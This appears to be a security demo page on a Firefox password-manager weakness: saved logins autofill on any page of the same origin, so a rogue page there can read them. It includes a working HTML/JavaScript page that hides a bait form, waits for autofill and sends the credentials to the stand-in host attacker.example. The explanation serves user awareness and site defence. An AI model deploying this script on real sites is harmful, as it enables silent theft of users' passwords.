In association with heise online

Firefox Demo: Password stealing

Firefox, if allowed, can store usernames and passwords. When you visit the login page again, the saved password is entered into the form automatically. The saved entry is bound to the site (the origin: scheme, host and port), not to the individual page, so Firefox also fills it into a login form on any other page of the same server. That means a second, evil page on the same server could steal those saved passwords: its script simply waits for the fields to be filled and reads them out.


Enter a fictional username and password in the form fields below, submit, and allow Firefox to save them. Do not enter real passwords.

Username: fake name
Password: fake password

Now open this "evil" page. It will read your username and password and display them in an alert message. It could just as well have sent them anywhere, and the evil page's output could be hidden entirely.
There has been some discussion about whether this really is a vulnerability in Firefox, because an attacker who can place script code on a server has other means of stealing passwords as well (phishing forms, keylogging in the page, and so on). For details see Holes in Firefox password manager.

This demo requires JavaScript, so if JavaScript is disabled, you are not vulnerable. A similar problem that worked without scripting has since been fixed by the developers. Apart from that: do not save passwords in Firefox for a server unless you can be sure that no evil script code can run in the context of that server. In practice this means that ordinary users of the site must not be able to publish pages containing JavaScript on the same origin as the login form.
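How such an evil page works, as an added example that is not the demo page's own code: it carries a login form on the same origin with the same field names as the real one, hidden off-screen, and a script that waits for Firefox to fill it and then reads the values. The field names user and pass and the host attacker.example are assumptions for illustration; a real attacker would drop the alert and keep only the silent request.

```html
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Evil page (password manager demo)</title>
</head>
<body>
<!-- A second page on the SAME origin as the login form.
     Firefox keys saved credentials to the origin, so it fills this
     form too, although the page is hidden and never submitted.
     The field names "user" and "pass" are assumed; they must match
     the names used by the real login form. -->
<form id="bait" action="#" style="position:absolute; left:-9999px">
  <input type="text"     name="user" id="user">
  <input type="password" name="pass" id="pass">
</form>

<script>
// Firefox fills saved credentials shortly after the document loads,
// so poll until both fields carry a value, giving up after ~5 s.
var tries = 0;
var poll = setInterval(function () {
  var u = document.getElementById('user').value;
  var p = document.getElementById('pass').value;
  if (u && p) {
    clearInterval(poll);
    // The demo displays the values; an attacker would stay silent.
    alert('Stolen: ' + u + ' / ' + p);
    // Exfiltration as a hidden image request. attacker.example is a
    // placeholder host, not a real collection server.
    new Image().src = 'https://attacker.example/collect?u=' +
        encodeURIComponent(u) + '&p=' + encodeURIComponent(p);
  } else if (++tries > 50) {
    clearInterval(poll);      // nothing saved for this origin
  }
}, 100);
</script>
</body>
</html>
```

Nothing on this page asks the user for anything: the form is off-screen, the request goes out as an image load, and the victim sees only a blank page. The check a site operator can make is therefore the one the text states: whether any user of the site can get a page with their own script served from the origin that hosts the login form.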

